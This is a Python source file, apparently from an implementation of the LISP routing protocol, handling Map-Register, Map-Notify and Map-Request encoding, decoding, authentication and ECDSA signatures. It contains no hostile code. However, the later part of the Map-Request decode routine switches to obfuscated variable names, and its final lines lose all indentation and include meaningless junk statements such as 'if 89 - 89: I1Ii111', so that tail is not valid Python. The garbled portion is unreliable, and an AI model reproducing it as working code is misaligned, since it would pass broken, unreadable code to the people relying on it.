            self.to_etr = True if (typeval & 0x02) else False
            self.to_ms = True if (typeval & 0x01) else False

        if (self.type == LISP_NAT_INFO):
            self.info_reply = True if (typeval & 0x08) else False

        return(True)

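    #
    # The high nibble of the first byte is the LISP message type. The
    # remaining bits decoded above are type-specific: 0x02/0x01/0x40 are
    # the probe/SMR/SMR-invoked bits for Map-Request, 0x04/0x02/0x01 the
    # DDT/to-ETR/to-MS bits for ECM, and 0x08 the reply bit for NAT-Info.
    #
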
    def is_info_request(self):
        return((self.type == LISP_NAT_INFO and self.is_info_reply() == False))

    def is_info_reply(self):
        return(True if self.info_reply else False)

    def is_rloc_probe(self):
        return(True if self.rloc_probe else False)

    def is_smr(self):
        return(True if self.smr_bit else False)

    def is_smr_invoked(self):
        return(True if self.smr_invoked_bit else False)

    def is_ddt(self):
        return(True if self.ddt_bit else False)

    def is_to_etr(self):
        return(True if self.to_etr else False)

    def is_to_ms(self):
        return(True if self.to_ms else False)

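#
# Map-Register message support. The header encoded/decoded below is a
# 4-byte word carrying the type, the P/S/I/T/R/M/N/F/E flag bits, and a
# record-count, followed by a 64-bit nonce, key-id, alg-id, auth-len, and
# authentication data. When the I-bit is set, a 128-bit xtr-id and 64-bit
# site-id trail the message.
#
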
class lisp_map_register():
    def __init__(self):
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        self.xtr_id = 0
        self.site_id = 0
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None

    def print_map_register(self):
        xtr_id = lisp_hex_string(self.xtr_id)

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")

        lprint(line.format(bold("Map-Register", False),
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.alg_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.alg_id == LISP_SHA_256_128_ALG_ID)
            else ""), self.auth_len, xtr_id, self.site_id))

    def encode(self):
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        if (self.encryption_key_id != None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14

        #
        # Set auth-len based on the configured alg-id.
        #
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN

            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        packet = self.zero_auth(packet)
        return(packet)

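    #
    # Flag-bit positions used above, for reference: P=0x08000000,
    # S=0x04000000, I=0x02000000 in the high bits; E=0x2000, F=0x1000,
    # T=0x800, R=0x400, M=0x200, N=0x100 in the low bits, with a 3-bit
    # encryption key-id at bits 16-14.
    #
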
    def zero_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = ""
        auth_len = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_len = struct.calcsize("QQI")

        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_len = struct.calcsize("QQQQ")

        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return(packet)

    def encode_auth(self, packet):
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        auth_data = self.auth_data
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return(packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        self.nonce, self.key_id, self.alg_id, self.auth_len = struct.unpack(
            packet_format, packet[:format_size])

        self.auth_len = socket.ntohs(self.auth_len)
        self.proxy_reply_requested = True if (first_long & 0x08000000) \
            else False
        self.lisp_sec_present = True if (first_long & 0x04000000) else False
        self.xtr_id_present = True if (first_long & 0x02000000) else False
        self.use_ttl_for_timeout = True if (first_long & 0x800) else False
        self.map_register_refresh = True if (first_long & 0x1000) else False
        self.merge_register_requested = True if (first_long & 0x400) \
            else False
        self.mobile_node = True if (first_long & 0x200) else False
        self.map_notify_requested = True if (first_long & 0x100) else False
        self.record_count = first_long & 0xff

        #
        # Decode the E-bit and the encryption key-id.
        #
        self.encrypt_bit = True if first_long & 0x2000 else False
        if (self.encrypt_bit):
            self.encryption_key_id = (first_long >> 14) & 0x7

        #
        # Decode xtr-id and site-id from the message trailer, if present.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(orig_packet) == False):
                return([None, None])

        packet = packet[format_size::]

        #
        # Parse and validate the authentication material.
        #
        if (self.auth_len != 0):
            if (len(packet) < self.auth_len): return([None, None])

            if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
                LISP_SHA_256_128_ALG_ID)):
                lprint("Invalid authentication alg-id: {}".format(
                    self.alg_id))
                return([None, None])

            auth_len = self.auth_len
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                format_size = struct.calcsize("QQI")
                if (auth_len < format_size):
                    lprint("Invalid sha1-96 authentication length")
                    return([None, None])

                auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
                auth4 = ""
            elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
                format_size = struct.calcsize("QQQQ")
                if (auth_len < format_size):
                    lprint("Invalid sha2-256 authentication length")
                    return([None, None])

                auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                    packet[:auth_len])
            else:
                lprint("Unsupported authentication alg-id value {}".format(
                    self.alg_id))
                return([None, None])

            self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
                auth3, auth4)
            orig_packet = self.zero_auth(orig_packet)
            packet = packet[self.auth_len::]

        return([orig_packet, packet])

    def encode_xtr_id(self, packet):
        xtr_id_upper = self.xtr_id >> 64
        xtr_id_lower = self.xtr_id & 0xffffffffffffffff
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        site_id = byte_swap_64(self.site_id)
        packet += struct.pack("QQQ", xtr_id_upper, xtr_id_lower, site_id)
        return(packet)

    def decode_xtr_id(self, packet):
        format_size = struct.calcsize("QQQ")
        if (len(packet) < format_size): return([None, None])
        packet = packet[len(packet) - format_size::]
        xtr_id_upper, xtr_id_lower, site_id = struct.unpack("QQQ",
            packet[:format_size])
        xtr_id_upper = byte_swap_64(xtr_id_upper)
        xtr_id_lower = byte_swap_64(xtr_id_lower)
        self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
        self.site_id = byte_swap_64(site_id)
        return(True)

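    #
    # The xtr-id/site-id trailer is always the last 24 bytes of the
    # message: two byte-swapped 64-bit words of xtr-id followed by a
    # byte-swapped 64-bit site-id, which is why decode_xtr_id() indexes
    # from the end of the packet rather than the front.
    #
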
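#
# Map-Notify and Map-Notify-Ack message support. Both use the same layout:
# type and record-count in the first 4-byte word, then a 64-bit nonce,
# key-id, alg-id, auth-len, authentication data, and the EID-records.
#
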
class lisp_map_notify():
    def __init__(self, lisp_sockets):
        self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.etr_port = 0
        self.retransmit_timer = None
        self.lisp_sockets = lisp_sockets
        self.retry_count = 0
        self.record_count = 0
        self.alg_id = LISP_NONE_ALG_ID
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = ""
        self.nonce = 0
        self.nonce_key = ""
        self.packet = None
        self.site = ""
        self.map_notify_ack = False
        self.eid_records = ""
        self.eid_list = []

    def print_notify(self):
        auth_data = binascii.hexlify(self.auth_data)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth_data) != 40):
            auth_data = self.auth_data
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID and
            len(auth_data) != 64):
            auth_data = self.auth_data

        line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
            "{}/{}{}, auth-len: {}, auth-data: {}")
        lprint(line.format(bold("Map-Notify-Ack", False) if
            self.map_notify_ack else bold("Map-Notify", False),
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id, " (sha1)" if (self.alg_id == LISP_SHA_1_96_ALG_ID)
            else (" (sha2)" if (self.alg_id == LISP_SHA_256_128_ALG_ID)
            else ""), self.auth_len, auth_data))

    def zero_auth(self, packet):
        if (self.alg_id == LISP_NONE_ALG_ID): return(packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)

        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)

        packet += auth_data
        return(packet)

    def encode(self, eid_records, password):
        if (self.map_notify_ack):
            first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
        else:
            first_long = (LISP_MAP_NOTIFY << 28) | self.record_count

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        if (self.alg_id == LISP_NONE_ALG_ID):
            self.packet = packet + eid_records
            return(self.packet)

        #
        # Run the authentication hash across the packet with a zeroed
        # auth field, then splice the digest in.
        #
        packet = self.zero_auth(packet)
        packet += eid_records

        hashval = lisp_hash_me(packet, self.alg_id, password, False)

        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        self.auth_data = hashval
        packet = packet[0:offset] + hashval + packet[offset + auth_len::]
        self.packet = packet
        return(packet)

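    #
    # The authentication pattern above: hash the whole message with the
    # auth field zeroed, then splice the digest back over the zeroed
    # field. decode() below reproduces the zeroed form so a receiver can
    # recompute and compare the hash.
    #
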
    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = socket.ntohl(first_long[0])
        self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
        self.record_count = first_long & 0xff
        packet = packet[format_size::]

        packet_format = "QBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        self.nonce, self.key_id, self.alg_id, self.auth_len = struct.unpack(
            packet_format, packet[:format_size])

        self.nonce_key = lisp_hex_string(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        packet = packet[format_size::]
        self.eid_records = packet[self.auth_len::]

        if (self.auth_len == 0): return(self.eid_records)

        #
        # Parse the authentication data and return the packet with a
        # zeroed auth field so the caller can verify the hash.
        #
        if (len(packet) < self.auth_len): return(None)

        auth_len = self.auth_len
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
            auth4 = ""

        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                packet[:auth_len])

        self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
            auth3, auth4)

        format_size = struct.calcsize("I") + struct.calcsize("QHH")
        packet = self.zero_auth(orig_packet[:format_size])
        format_size += auth_len
        packet += orig_packet[format_size::]
        return(packet)

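#
# Map-Request message support: building, signing, encoding, and decoding
# Map-Requests, including the JSON-encoded LCAFs used to carry ECDSA
# signatures and RLOC-probe telemetry in the ITR-RLOC list.
#
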
class lisp_map_request():
    def __init__(self):
        self.auth_bit = False
        self.map_data_present = False
        self.rloc_probe = False
        self.smr_bit = False
        self.pitr_bit = False
        self.smr_invoked_bit = False
        self.mobile_node = False
        self.xtr_id_present = False
        self.local_xtr = False
        self.dont_reply_bit = False
        self.itr_rloc_count = 0
        self.record_count = 0
        self.nonce = 0
        self.signature_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.source_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.target_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.itr_rlocs = []
        self.keys = None
        self.privkey_filename = None
        self.map_request_signature = None
        self.subscribe_bit = False
        self.xtr_id = None
        self.json_telemetry = None

    def print_prefix(self):
        if (self.target_group.is_null()):
            return(green(self.target_eid.print_prefix(), False))

        return(green(self.target_eid.print_sg(self.target_group), False))

    def print_map_request(self):
        xtr_id = ""
        if (self.xtr_id != None and self.subscribe_bit):
            xtr_id = "subscribe, xtr-id: 0x{}, ".format(
                lisp_hex_string(self.xtr_id))

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
            "count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
            "afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:")

        lprint(line.format(bold("Map-Request", False),
            "A" if self.auth_bit else "a",
            "D" if self.map_data_present else "d",
            "R" if self.rloc_probe else "r",
            "S" if self.smr_bit else "s",
            "P" if self.pitr_bit else "p",
            "I" if self.smr_invoked_bit else "i",
            "M" if self.mobile_node else "m",
            "X" if self.xtr_id_present else "x",
            "L" if self.local_xtr else "l",
            "D" if self.dont_reply_bit else "d", self.itr_rloc_count,
            self.record_count, lisp_hex_string(self.nonce),
            self.source_eid.afi, green(self.source_eid.print_address(),
            False), " (with sig)" if self.map_request_signature != None
            else "", self.target_eid.afi, green(self.print_prefix(), False),
            xtr_id))

        keys = self.keys
        for itr_rloc in self.itr_rlocs:
            if (itr_rloc.afi == LISP_AFI_LCAF and
                self.json_telemetry != None):
                continue

            rloc_str = red(itr_rloc.print_address_no_iid(), False)
            lprint(" itr-rloc: afi {} {}{}".format(itr_rloc.afi, rloc_str,
                "" if (keys == None) else ", " + keys[1].print_keys()))
            keys = None

        if (self.json_telemetry != None):
            lprint(" itr-rloc: afi {} telemetry: {}".format(LISP_AFI_LCAF,
                self.json_telemetry))

    def sign_map_request(self, privkey):
        sig_eid = self.signature_eid.print_address()
        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        self.map_request_signature = privkey.sign(sig_data)
        sig = binascii.b2a_base64(self.map_request_signature)
        sig = {"source-eid": source_eid, "signature-eid": sig_eid,
            "signature": sig}
        return(json.dumps(sig))

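    #
    # The signed data is the concatenation of the hex-encoded nonce, the
    # source EID, and the target EID; verify_map_request_sig() below
    # rebuilds exactly the same string before calling verify().
    #
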
    def verify_map_request_sig(self, pubkey):
        sig_eid = green(self.signature_eid.print_address(), False)
        if (pubkey == None):
            lprint("Public-key not found for signature-EID {}".format(
                sig_eid))
            return(False)

        source_eid = self.source_eid.print_address()
        target_eid = self.target_eid.print_address()
        sig_data = lisp_hex_string(self.nonce) + source_eid + target_eid
        pubkey = binascii.a2b_base64(pubkey)

        good = True
        try:
            key = ecdsa.VerifyingKey.from_pem(pubkey)
        except:
            lprint("Invalid public-key in mapping system for sig-eid " +
                "{}".format(self.signature_eid.print_address_no_iid()))
            good = False

        if (good):
            try:
                good = key.verify(self.map_request_signature, sig_data)
            except:
                good = False

        passfail = bold("passed" if good else "failed", False)
        lprint("Signature verification {} for EID {}".format(passfail,
            sig_eid))
        return(good)

    def encode_json(self, json_string):
        lcaf_type = LISP_LCAF_JSON_TYPE
        lcaf_afi = socket.htons(LISP_AFI_LCAF)
        lcaf_len = socket.htons(len(json_string) + 2)
        json_len = socket.htons(len(json_string))
        packet = struct.pack("HBBBBHH", lcaf_afi, 0, 0, lcaf_type, 0,
            lcaf_len, json_len)
        packet += json_string
        packet += struct.pack("H", 0)
        return(packet)

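    #
    # JSON LCAF layout as packed above: AFI=LCAF (2) | rsvd (1) |
    # flags (1) | Type=JSON (1) | rsvd (1) | lcaf-length (2) |
    # json-length (2) | JSON string | trailing AFI of 0 (2). Note that
    # lcaf-length is json-length plus 2 for the trailing AFI.
    #
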
    def encode(self, probe_dest, probe_port):
        first_long = (LISP_MAP_REQUEST << 28) | self.record_count

        #
        # If telemetry is configured and this is an RLOC-probe, a JSON
        # ITR-RLOC is appended, so bump the ITR-RLOC count.
        #
        telemetry = lisp_telemetry_configured() if (self.rloc_probe) \
            else None
        if (telemetry != None): self.itr_rloc_count += 1
        first_long = first_long | (self.itr_rloc_count << 8)

        if (self.auth_bit): first_long |= 0x08000000
        if (self.map_data_present): first_long |= 0x04000000
        if (self.rloc_probe): first_long |= 0x02000000
        if (self.smr_bit): first_long |= 0x01000000
        if (self.pitr_bit): first_long |= 0x00800000
        if (self.smr_invoked_bit): first_long |= 0x00400000
        if (self.mobile_node): first_long |= 0x00200000
        if (self.xtr_id_present): first_long |= 0x00100000
        if (self.local_xtr): first_long |= 0x00004000
        if (self.dont_reply_bit): first_long |= 0x00002000

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)

        #
        # Sign the Map-Request when a private-key file is configured, or
        # reuse a signature supplied by the caller. Either way the result
        # is carried in a JSON LCAF in place of the source-EID.
        #
        encode_sig = False
        filename = self.privkey_filename
        if (filename != None and os.path.exists(filename)):
            f = open(filename, "r"); key = f.read(); f.close()
            try:
                key = ecdsa.SigningKey.from_pem(key)
            except:
                return(None)

            json_string = self.sign_map_request(key)
            encode_sig = True
        elif (self.map_request_signature != None):
            sig = binascii.b2a_base64(self.map_request_signature)
            json_string = {"source-eid": self.source_eid.print_address(),
                "signature-eid": self.signature_eid.print_address(),
                "signature": sig}
            json_string = json.dumps(json_string)
            encode_sig = True

        if (encode_sig):
            packet += self.encode_json(json_string)
        else:
            if (self.source_eid.instance_id != 0):
                packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
                packet += self.source_eid.lcaf_encode_iid()
            else:
                packet += struct.pack("H",
                    socket.htons(self.source_eid.afi))
                packet += self.source_eid.pack_address()

        #
        # For an RLOC-probe, reuse any stored encap keys for the probed
        # RLOC and port.
        #
        if (probe_dest):
            if (probe_port == 0): probe_port = LISP_DATA_PORT
            addr_str = probe_dest.print_address_no_iid() + ":" + \
                str(probe_port)

            if (lisp_crypto_keys_by_rloc_encap.has_key(addr_str)):
                self.keys = lisp_crypto_keys_by_rloc_encap[addr_str]

        #
        # Encode the ITR-RLOCs. When data-plane security is enabled, the
        # first ITR-RLOC carries key material in a Security Type LCAF.
        #
        for itr_rloc in self.itr_rlocs:
            if (lisp_data_plane_security and
                self.itr_rlocs.index(itr_rloc) == 0):
                if (self.keys == None or self.keys[1] == None):
                    keys = lisp_keys(1)
                    self.keys = [None, keys, None, None]

                keys = self.keys[1]
                keys.add_key_by_nonce(self.nonce)
                packet += keys.encode_lcaf(itr_rloc)
            else:
                packet += struct.pack("H", socket.htons(itr_rloc.afi))
                packet += itr_rloc.pack_address()

        #
        # Encode telemetry as the last ITR-RLOC, if configured.
        #
        if (telemetry != None):
            ts = str(time.time())
            telemetry = lisp_encode_telemetry(telemetry, io=ts)
            self.json_telemetry = telemetry
            packet += self.encode_json(telemetry)

        mask_len = 0 if self.target_eid.is_binary() == False else \
            self.target_eid.mask_len

        subscribe = 0
        if (self.subscribe_bit):
            subscribe = 0x80
            self.xtr_id_present = True
            if (self.xtr_id == None):
                self.xtr_id = random.randint(0, (2**128) - 1)

        packet += struct.pack("BB", subscribe, mask_len)

        if (self.target_group.is_null() == False):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_sg(self.target_group)
        elif (self.target_eid.instance_id != 0 or
            self.target_eid.is_geo_prefix()):
            packet += struct.pack("H", socket.htons(LISP_AFI_LCAF))
            packet += self.target_eid.lcaf_encode_iid()
        else:
            packet += struct.pack("H", socket.htons(self.target_eid.afi))
            packet += self.target_eid.pack_address()

        #
        # Append the xtr-id trailer when subscribing.
        #
        if (self.subscribe_bit): packet = self.encode_xtr_id(packet)
        return(packet)

    def lcaf_decode_json(self, packet):
        packet_format = "BBBBHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        rsvd1, flags, lcaf_type, rsvd2, lcaf_len, json_len = struct.unpack(
            packet_format, packet[:format_size])

        if (lcaf_type != LISP_LCAF_JSON_TYPE): return(packet)

        #
        # Validate lengths: the LCAF length must cover the JSON string
        # plus the trailing AFI.
        #
        lcaf_len = socket.ntohs(lcaf_len)
        json_len = socket.ntohs(json_len)
        packet = packet[format_size::]
        if (len(packet) < lcaf_len): return(None)
        if (lcaf_len != json_len + 2): return(None)

        #
        # Extract the JSON string.
        #
        json_string = packet[0:json_len]
        packet = packet[json_len::]

        #
        # If this is telemetry JSON, just store it.
        #
        if (lisp_is_json_telemetry(json_string) != None):
            self.json_telemetry = json_string

        #
        # Parse the trailing AFI, which must be 0.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0): return(packet)

        if (self.json_telemetry != None): return(packet)

        #
        # Otherwise this is a signature JSON; parse its fields.
        #
        try:
            json_string = json.loads(json_string)
        except:
            return(None)

        if (json_string.has_key("source-eid") == False): return(packet)
        eid = json_string["source-eid"]
        afi = LISP_AFI_IPV4 if eid.count(".") == 3 else LISP_AFI_IPV6 if \
            eid.count(":") == 7 else None

        if (afi == None):
            lprint("Bad JSON 'source-eid' value: {}".format(eid))
            return(None)

        self.source_eid.afi = afi
        self.source_eid.store_address(eid)

        if (json_string.has_key("signature-eid") == False): return(packet)
        eid = json_string["signature-eid"]
        if (eid.count(":") != 7):
            lprint("Bad JSON 'signature-eid' value: {}".format(eid))
            return(None)

        self.signature_eid.afi = LISP_AFI_IPV6
        self.signature_eid.store_address(eid)

        if (json_string.has_key("signature") == False): return(packet)
        sig = binascii.a2b_base64(json_string["signature"])
        self.map_request_signature = sig
        return(packet)

    def decode(self, packet, source, port):
        i1I1iii1I11II = "I"
        Iiiii = struct.calcsize(i1I1iii1I11II)
        if (len(packet) < Iiiii): return(None)

        iII = struct.unpack(i1I1iii1I11II, packet[:Iiiii])
        iII = iII[0]
        packet = packet[Iiiii::]

        i1I1iii1I11II = "Q"
        Iiiii = struct.calcsize(i1I1iii1I11II)
        if (len(packet) < Iiiii): return(None)

        Iii11I = struct.unpack(i1I1iii1I11II, packet[:Iiiii])
        packet = packet[Iiiii::]

        #
        # Decode the flag bits from the first long word.
        #
        iII = socket.ntohl(iII)
        self.auth_bit = True if (iII & 0x08000000) else False
        self.map_data_present = True if (iII & 0x04000000) else False
        self.rloc_probe = True if (iII & 0x02000000) else False
        self.smr_bit = True if (iII & 0x01000000) else False
        self.pitr_bit = True if (iII & 0x00800000) else False
        self.smr_invoked_bit = True if (iII & 0x00400000) else False
        self.mobile_node = True if (iII & 0x00200000) else False
        self.xtr_id_present = True if (iII & 0x00100000) else False
        self.local_xtr = True if (iII & 0x00004000) else False
        self.dont_reply_bit = True if (iII & 0x00002000) else False
        self.itr_rloc_count = ((iII >> 8) & 0x1f)
        self.record_count = iII & 0xff
        self.nonce = Iii11I[0]

        #
        # Decode the xtr-id trailer if the sender set the I-bit.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(packet) == False): return(None)

        Iiiii = struct.calcsize("H")
        if (len(packet) < Iiiii): return(None)

        O0ooo0 = struct.unpack("H", packet[:Iiiii])
        self.source_eid.afi = socket.ntohs(O0ooo0[0])
        packet = packet[Iiiii::]

        #
        # The source-EID may be LCAF-encoded: either an instance-id LCAF
        # or a JSON LCAF carrying a signature.
        #
        if (self.source_eid.afi == LISP_AFI_LCAF):
            Oo0OO = packet
            packet = self.source_eid.lcaf_decode_iid(packet)
            if (packet == None):
                packet = self.lcaf_decode_json(Oo0OO)
                if (packet == None): return(None)

        elif (self.source_eid.afi != LISP_AFI_NONE):
            packet = self.source_eid.unpack_address(packet)
            if (packet == None): return(None)

        self.source_eid.mask_len = self.source_eid.host_mask_len()

        O0Oo0 = (os.getenv("LISP_NO_CRYPTO") != None)
        self.itr_rlocs = []
        oOOoo0000o = self.itr_rloc_count + 1

        while (oOOoo0000o != 0):
            Iiiii = struct.calcsize("H")
            if (len(packet) < Iiiii): return(None)

            O0ooo0 = socket.ntohs(struct.unpack("H", packet[:Iiiii])[0])
            I11iiII1I1111 = lisp_address(LISP_AFI_NONE, "", 32, 0)
            I11iiII1I1111.afi = O0ooo0

            #
            # An LCAF-encoded ITR-RLOC may be JSON telemetry; try to
            # decode it and back up if it was not JSON after all.
            #
            if (I11iiII1I1111.afi == LISP_AFI_LCAF):
                OoO = packet
                Oo000o0o0 = packet[Iiiii::]
                packet = self.lcaf_decode_json(Oo000o0o0)
                if (packet == Oo000o0o0): packet = OoO

            #
            # Plain AFI-encoded ITR-RLOC.
            #
            if (I11iiII1I1111.afi != LISP_AFI_LCAF):
                if (len(packet) < I11iiII1I1111.addr_length()):
                    return(None)
                packet = I11iiII1I1111.unpack_address(packet[Iiiii::])
                if (packet == None): return(None)

                if (O0Oo0):
                    self.itr_rlocs.append(I11iiII1I1111)
                    oOOoo0000o -= 1
                    continue

                oo0o00OO = lisp_build_crypto_decap_lookup_key(
                    I11iiII1I1111, port)

                #
                # If the ITR is behind a NAT, its ITR-RLOC is a private
                # address; use the outer source address instead.
                #
                if (lisp_nat_traversal and
                    I11iiII1I1111.is_private_address() and source):
                    I11iiII1I1111 = source

                I1ioOo = lisp_crypto_keys_by_rloc_decap
                if (I1ioOo.has_key(oo0o00OO)): I1ioOo.pop(oo0o00OO)

                #
                # No security material in this ITR-RLOC, so tell the
                # data-plane to remove any stale decap keys.
                #
                lisp_write_ipc_decap_key(oo0o00OO, None)

            elif (self.json_telemetry == None):

                #
                # Decode security-key material from the Security Type
                # LCAF. First probe for the cipher suite, then re-decode
                # with a key object of the matching flavor.
                #
                OoO = packet
                iI1IiI1 = lisp_keys(1)
                packet = iI1IiI1.decode_lcaf(OoO, 0)

                if (packet == None): return(None)

                iI111I = [LISP_CS_25519_CBC, LISP_CS_25519_GCM,
                    LISP_CS_25519_CHACHA]
                if (iI1IiI1.cipher_suite in iI111I):
                    if (iI1IiI1.cipher_suite == LISP_CS_25519_CBC or
                        iI1IiI1.cipher_suite == LISP_CS_25519_GCM):
                        Oo000O000 = lisp_keys(1, do_poly=False,
                            do_chacha=False)

                    if (iI1IiI1.cipher_suite == LISP_CS_25519_CHACHA):
                        Oo000O000 = lisp_keys(1, do_poly=True,
                            do_chacha=True)
                else:
                    Oo000O000 = lisp_keys(1, do_poly=False, do_curve=False,
                        do_chacha=False)

                packet = Oo000O000.decode_lcaf(OoO, 0)
                if (packet == None): return(None)

                if (len(packet) < Iiiii): return(None)
                O0ooo0 = struct.unpack("H", packet[:Iiiii])[0]
                I11iiII1I1111.afi = socket.ntohs(O0ooo0)
                if (len(packet) < I11iiII1I1111.addr_length()):
                    return(None)

                packet = I11iiII1I1111.unpack_address(packet[Iiiii::])
                if (packet == None): return(None)

                if (O0Oo0):
                    self.itr_rlocs.append(I11iiII1I1111)
                    oOOoo0000o -= 1
                    continue

                oo0o00OO = lisp_build_crypto_decap_lookup_key(
                    I11iiII1I1111, port)

                oO0OooO0o0 = None
                if (lisp_nat_traversal and
                    I11iiII1I1111.is_private_address() and source):
                    I11iiII1I1111 = source

                if (lisp_crypto_keys_by_rloc_decap.has_key(oo0o00OO)):
                    iIi11III = lisp_crypto_keys_by_rloc_decap[oo0o00OO]
                    oO0OooO0o0 = iIi11III[1] if iIi11III and iIi11III[1] \
                        else None
if 89 - 89: I1Ii111
if 19 - 19: IiII + I1Ii111
O0OOOo000 = True
if ( oO0OooO0o0 ) :
if ( oO0OooO0o0 . compare_keys ( Oo000O000 ) ) :
self . keys = [ None , oO0OooO0o0 , None , None ]
lprint ( "Maintain stored decap-keys for RLOC {}" . format ( red ( oo0o00OO , False ) ) )
if 5 - 5: OoO0O00 / iII111i / OOooOOo
else :
O0OOOo000 = False
OOO0o0oo = bold ( "Remote decap-rekeying" , False )
lprint ( "{} for RLOC {}" . format ( OOO0o0oo , red ( oo0o00OO ,
False ) ) )
Oo000O000 . copy_keypair ( oO0OooO0o0 )
Oo000O000 . uptime = oO0OooO0o0 . uptime
oO0OooO0o0 = None
if 68 - 68: iII111i . OOooOOo
if 6 - 6: Ii1I - o0oOOo0O0Ooo % I11i + i11iIiiIii
if 40 - 40: O0 . Ii1I
if ( oO0OooO0o0 == None ) :
